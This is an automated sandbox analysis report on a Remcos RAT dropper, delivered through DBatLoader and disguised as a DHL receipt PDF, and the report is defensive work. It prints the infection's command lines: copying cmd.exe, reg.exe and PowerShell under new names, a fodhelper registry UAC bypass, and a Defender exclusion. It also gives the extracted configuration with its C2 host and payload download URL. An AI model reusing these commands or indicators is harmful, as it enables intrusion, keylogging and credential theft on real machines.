Windows
Analysis Report
DHL119040 receipt document,pdf.exe
Overview
General Information
Detection
Remcos, DBatLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: TrustedPath UAC Bypass Pattern
Snort IDS alert for network traffic
UAC bypass detected (Fodhelper)
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates autostart registry keys with suspicious names
Creates multiple autostart registry keys
Delayed program exit found
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executables to the windows directory (C:\Windows) and starts them
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Maps a DLL or memory area into another process
Opens network shares
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Reg Add Open Command
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
DHL119040 receipt document,pdf.exe (PID: 7380 cmdline:
"C:\Users\ user\Deskt op\DHL1190 40 receipt document, pdf.exe" MD5: 0DB7FBC1B1D0AF0A9503401691F95E30) yfkwifxL.pif (PID: 7476 cmdline:
C:\Users\P ublic\Libr aries\yfkw ifxL.pif MD5: C116D3604CEAFE7057D77FF27552C215) cmd.exe (PID: 7536 cmdline:
"C:\Window s\sysnativ e\cmd.exe" /c "C:\Us ers\user\A ppData\Loc al\Temp\97 1D.tmp\971 E.tmp\971F .bat C:\Us ers\Public \Libraries \yfkwifxL. pif" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 7556 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) extrac32.exe (PID: 7616 cmdline:
C:\\Window s\\System3 2\\extrac3 2 /C /Y C: \\Windows\ \System32\ \cmd.exe " C:\\Users\ \Public\\a lpha.exe" MD5: 41330D97BF17D07CD4308264F3032547) alpha.exe (PID: 7700 cmdline:
C:\\Users\ \Public\\a lpha /c mk dir "\\?\C :\Windows " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) alpha.exe (PID: 7720 cmdline:
C:\\Users\ \Public\\a lpha /c mk dir "\\?\C :\Windows \System32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) alpha.exe (PID: 7744 cmdline:
C:\\Users\ \Public\\a lpha /c ex trac32 /C /Y C:\\Win dows\\Syst em32\\reg. exe "C:\\U sers\\Publ ic\\ger.ex e" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) extrac32.exe (PID: 7760 cmdline:
extrac32 / C /Y C:\\W indows\\Sy stem32\\re g.exe "C:\ \Users\\Pu blic\\ger. exe" MD5: 41330D97BF17D07CD4308264F3032547) alpha.exe (PID: 7784 cmdline:
C:\\Users\ \Public\\a lpha /c ex trac32 /C /Y C:\\Win dows\\Syst em32\\Wind owsPowerSh ell\\v1.0\ \powershel l.exe "C:\ \Users\\Pu blic\\xkn. exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) extrac32.exe (PID: 7804 cmdline:
extrac32 / C /Y C:\\W indows\\Sy stem32\\Wi ndowsPower Shell\\v1. 0\\powersh ell.exe "C :\\Users\\ Public\\xk n.exe" MD5: 41330D97BF17D07CD4308264F3032547) alpha.exe (PID: 7844 cmdline:
C:\\Users\ \Public\\a lpha /c ex trac32 /C /Y C:\\Win dows\\Syst em32\\fodh elper.exe "C:\\Windo ws \\Syste m32\\per.e xe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) extrac32.exe (PID: 7860 cmdline:
extrac32 / C /Y C:\\W indows\\Sy stem32\\fo dhelper.ex e "C:\\Win dows \\Sys tem32\\per .exe" MD5: 41330D97BF17D07CD4308264F3032547) alpha.exe (PID: 7884 cmdline:
C:\\Users\ \Public\\a lpha /c C: \\Users\\P ublic\\xkn -WindowSt yle hidden -Command "C:\\Users \\Public\\ alpha /c C :\\Users\\ Public\\ge r add HKCU \Software\ Classes\ms -settings\ shell\open \command / f /ve /t R EG_SZ /d ' C:\\Users\ \Public\\x kn -Window Style hidd en -Comman d "Add-MpP reference -Exclusion Path C:\"' ; " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) xkn.exe (PID: 7900 cmdline:
C:\\Users\ \Public\\x kn -Window Style hidd en -Comman d "C:\\Use rs\\Public \\alpha /c C:\\Users \\Public\\ ger add HK CU\Softwar e\Classes\ ms-setting s\shell\op en\command /f /ve /t REG_SZ /d 'C:\\User s\\Public\ \xkn -Wind owStyle hi dden -Comm and "Add-M pPreferenc e -Exclusi onPath C:\ "' ; " MD5: 04029E121A0CFA5991749937DD22A1D9) alpha.exe (PID: 8076 cmdline:
"C:\Users\ Public\alp ha.exe" /c C:\\Users \\Public\\ ger add HK CU\Softwar e\Classes\ ms-setting s\shell\op en\command /f /ve /t REG_SZ /d "C:\\User s\\Public\ \xkn -Wind owStyle hi dden -Comm and Add-Mp Preference -Exclusio nPath C:"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) ger.exe (PID: 8096 cmdline:
C:\\Users\ \Public\\g er add HKC U\Software \Classes\m s-settings \shell\ope n\command /f /ve /t REG_SZ /d "C:\\Users \\Public\\ xkn -Windo wStyle hid den -Comma nd Add-MpP reference -Exclusion Path C:"" MD5: 227F63E1D9008B36BDBCC4B397780BE4) per.exe (PID: 6904 cmdline:
"C:\\Windo ws \\Syste m32\\per.e xe" MD5: 85018BE1FD913656BC9FF541F017EACD) alpha.exe (PID: 7720 cmdline:
C:\\Users\ \Public\\a lpha /c ta skkill /F /IM System Settings.e xe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) taskkill.exe (PID: 7760 cmdline:
taskkill / F /IM Syst emSettings .exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) alpha.exe (PID: 6016 cmdline:
C:\\Users\ \Public\\a lpha /c pi ng 127.0.0 .1 -n 2 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) PING.EXE (PID: 7788 cmdline:
ping 127.0 .0.1 -n 2 MD5: 2F46799D79D22AC72C241EC0322B011D) alpha.exe (PID: 5852 cmdline:
C:\\Users\ \Public\\a lpha /c de l /q "C:\W indows \Sy stem32\*" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) alpha.exe (PID: 2992 cmdline:
C:\\Users\ \Public\\a lpha /c rm dir "C:\Wi ndows \Sys tem32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) alpha.exe (PID: 8108 cmdline:
C:\\Users\ \Public\\a lpha /c rm dir "C:\Wi ndows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) alpha.exe (PID: 8088 cmdline:
C:\\Users\ \Public\\a lpha /c de l /q "C:\\ Windows \\ System32\\ per.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) alpha.exe (PID: 7308 cmdline:
C:\\Users\ \Public\\a lpha /c de l /q "C:\U sers\Publi c\ger.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) alpha.exe (PID: 7416 cmdline:
C:\\Users\ \Public\\a lpha /c de l /q "C:\U sers\Publi c\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) alpha.exe (PID: 7456 cmdline:
C:\\Users\ \Public\\a lpha /c de l /q "C:\U sers\Publi c\xkn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) extrac32.exe (PID: 7520 cmdline:
C:\\Window s\\System3 2\\extrac3 2.exe /C / Y C:\Users \user\Desk top\DHL119 040 receip t document ,pdf.exe C :\\Users\\ Public\\Li braries\\L xfiwkfy.PI F MD5: 9472AAB6390E4F1431BAA912FCFF9707) remcos.exe (PID: 7596 cmdline:
"C:\Progra mData\Remc os\remcos. exe" MD5: 0DB7FBC1B1D0AF0A9503401691F95E30) conhost.exe (PID: 7960 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) remcos.exe (PID: 8144 cmdline:
C:\Program Data\Remco s\remcos.e xe /stext "C:\Users\ user\AppDa ta\Local\T emp\huychg flg" MD5: 0DB7FBC1B1D0AF0A9503401691F95E30) remcos.exe (PID: 8152 cmdline:
C:\Program Data\Remco s\remcos.e xe /stext "C:\Users\ user\AppDa ta\Local\T emp\jpluaz qfutyle" MD5: 0DB7FBC1B1D0AF0A9503401691F95E30) remcos.exe (PID: 8168 cmdline:
C:\Program Data\Remco s\remcos.e xe /stext "C:\Users\ user\AppDa ta\Local\T emp\tjrfar bgibqpoisd " MD5: 0DB7FBC1B1D0AF0A9503401691F95E30)
SystemSettingsAdminFlows.exe (PID: 5316 cmdline:
"C:\Window s\system32 \SystemSet tingsAdmin Flows.exe" OptionalF eaturesAdm inHelper MD5: 5FA3EEF00388ED6344B4C35BA7CAA460)
remcos.exe (PID: 8132 cmdline:
"C:\Progra mData\Remc os\remcos. exe" MD5: 0DB7FBC1B1D0AF0A9503401691F95E30)
remcos.exe (PID: 3844 cmdline:
"C:\Progra mData\Remc os\remcos. exe" MD5: 0DB7FBC1B1D0AF0A9503401691F95E30)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
DBatLoader | This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it. | No Attribution |
{"Download Url": ["https://onedrive.live.com/download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8"]}
{"Host:Port:Password": "jantasagasa.duckdns.org:44577:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0X3XK5", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
Click to see the 23 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen |
| |
Click to see the 7 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: |
Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: Max Altgelt (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: frack113: |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Stealing of Sensitive Information |
---|
Source: | Author: Joe Security: |
Timestamp: | 07/11/24-12:47:11.473328 |
SID: | 2032776 |
Source Port: | 49736 |
Destination Port: | 44577 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 07/11/24-12:49:23.758131 |
SID: | 2032777 |
Source Port: | 44577 |
Destination Port: | 49736 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Malware Configuration Extractor: | ||
Source: | Malware Configuration Extractor: |
Source: | Virustotal: | Perma Link |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Integrated Neural Analysis Model: |
Source: | Code function: | 0_2_2DA73837 | |
Source: | Code function: | 5_2_2D5A48C8 | |
Source: | Code function: | 5_2_2D5A6A63 | |
Source: | Code function: | 5_2_2D5B14F5 | |
Source: | Code function: | 5_2_2D5D3837 | |
Source: | Code function: | 20_2_00404423 |
Source: | Binary or memory string: |
Exploits |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Privilege Escalation |
---|
Source: | Code function: | 0_2_2DA474FD |
Source: | Registry value created: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |